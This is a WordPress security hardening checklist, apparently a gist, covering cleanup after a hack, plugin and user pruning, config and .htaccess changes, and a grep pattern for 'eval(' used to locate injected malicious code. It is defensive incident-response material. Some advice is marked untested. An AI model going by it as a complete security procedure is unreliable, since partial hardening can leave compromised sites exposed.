Hardening WP Security
the full punchlist
A shortened, actionable version of- Sync your entire live site down to your local repo
- Change the WordPress default
admin
user + generate a new password - Remove any users that aren’t supposed to be there, or that are no longer in use
- Update WordPress (in case you need to update it manually: https://gist.github.com/ericrasch/4192dc480398a896d4d58b5afe08a1d0)
- Update all WordPress plugins
- Remove unused plugins
- Remove unused themes
- Remove most
.php
/..php5
/.html
/.phtml
/.txt
files from the/wp-content/uploads
foler. - Run
grep -R --exclude="*.js" -e 'eval(' .|cut -c -80
in the command line of the site's root folder to help find evil code - Add this to the
wp-config.php
file:define( 'DISALLOW_FILE_EDIT', true );
- I highly recommend deleting the
/xml-rpc.php
file as an additional step to this: Disable XML-RPC access by adding this plugin to the/mu-plugins
folder: https://gist.github.com/ericrasch/bda89f60042dd433037b - Add this to your
.htaccess
for additional file security - Add these
.htaccess
files to both the/wp-content
and/wp-includes
folders - Run this sql command
UPDATE wp_posts SET ping_status="closed";
in a database editing app like Sequel Pro (but only if you know what you're doing). - change the table prefix in the
wp-config.php
file using the iThemes Security plugin - Install WP-Optimize and clean up the database locally, but there's no need to commit this (or iThemes) to a repo and/or exist on a live site (unless you're intending to keep iThemes on your site)
- If you're using the Genesis WordPress Skeleton Framework, run the
genesis:up:mirror
command to automatically sync/delete the hacked files within the/wp-content/uploads/
folder.
Must do... first thing
- Sync your entire live site down to your local repo to see if there are any new files on the live server that may/may not have added indicating your site has been exploited.
- example files I've personally found were
wp-editor.php
and.cache.php
- If you're using the Genesis WordPress Skeleton Framework, then run
bundle exec cap production genesis:down
- example files I've personally found were
- change the WordPress default
admin
user + password- create another Super Admin user
- If you're running your site as a company, use
companyname_admin
for the username andcontact+sitedomainwithextension@companyname.com
for the email (Staff Writers will work for a name and Staff as a nickname; just make sure you know what's being displayed publicly) and generate a password - login as that user
- delete the base
admin
user and auto-reassign all Post/Pages from that user to the new admin user you just created - If your company keeps track of multiple logins for your website(s), be sure to update those records, too.
- Go to your WordPress admin panel and remove any admin/editor users that aren’t supposed to be there, or that are no longer in use.
- Re-run the WordPress update tool (to overwrite all the files with a clean copy)
- If you're using the Genesis WordPress Skeleton Framework, then run
yo
to install the latest version of WordPress through Yeoman.
- If you're using the Genesis WordPress Skeleton Framework, then run
- Update all WordPress plugins. To see if an installed plugin has a known vulnerability, use the following plugins to check them:
- Remove unused plugins. Hackers can still files/issues within inactive plugins.
- Remove unused themes. Hackers can still files/issues within inactive themes.
- Remove most
.php
/..php5
/.html
/.phtml
/.txt
files from the/wp-content/uploads
foler. There's generally only 1index.php
in that foler. - Run
grep -R --exclude="*.js" -e 'eval(' .|cut -c -80
in the command line of the site's root folder to help find evil code (source: http://halfelf.org/2013/evaluating-evil/ which also gives a good snapshot of a clean WP install)
Second steps
- Scan your site/database with the following plugins:
- disallow file edits from with a theme
- add this to the
wp-config.php
file:define( 'DISALLOW_FILE_EDIT', true );
- add this to the
- disable XML-RPC access
- check if it's enabled on your site here: http://xmlrpc.eritreo.it/
- combine the 2 existing WP plugins for disabling this into one and add it as a new plugin to the
/mu-plugins
folder
Genesis WordPress Skeleton Framework, then do the following:
If you're not using the- Edit your
.htaccess
for additional file security by using the Solid Base .htaccess- be sure to change line #101
CHANGETHENAMEOFYOURWEBSITEHERE.com
where you need to reference your own website's domain
- be sure to change line #101
- Add these
.htaccess
files to both the/wp-content
and/wp-includes
folders
If you have the time/skill to mess with the database
- change the db username + password
- block old posts from trackback spammers:
- run this sql command:
UPDATE wp_posts SET ping_status="closed";
- run this sql command:
- change the table prefix in the
wp-config.php
file$table_prefix = 'wp_';
- consider installing to do this for you iThemes Security plugin to change this automatically
- look for malicious cron jobs running on your server
- one cron job we found recreated the
.cache.php
file every hour and at 00:27 minutes, so just deleting the file wasn't enough
- one cron job we found recreated the
Untested, but recommended
- Change permissions on core files:
chmod
.htaccess
to 444chmod
wp-config.php
to 400
- Consider enabling Two-Factor Authentication
Further Steps
- Scan your live site through Sucuri's SiteCheck: https://sitecheck.sucuri.net/
- Consider adding the WP-SpamShield Anti-Spam plugin
- This plugin is good, but it does as another
.js
script on the front-end of your website. I didn't like that, so I'm not going to use this plugin.
- This plugin is good, but it does as another
- Read the following for sources:
Plugins that helped:
- Sucuri Security
- Total Security
- Gauntlet Security
- BulletProof Security
- Site Protection
- iThemes Security plugin
- Plugin Security Scanner
- this plugin duplicated some of the functions from other plugins listed above
- WP-Optimize
- while not a security plugin, this one will help clean out comment spam and such
Plugins that didn't help:
Some of these worked just fine, but they required more digging to find out the actual issues on the site and/or were handled better by the plugins listed above. Others required you to create an account to even begin to use them.
Hi @ericrasch.
We always try to keep our plugins as helpful as possible (but not bloated with unneeded features), so we wonder, can you share a bit more details on why our plugin "WPSecureOps Easy Firewall" was not working for you? :)
Thanks!
WPSecureOps Team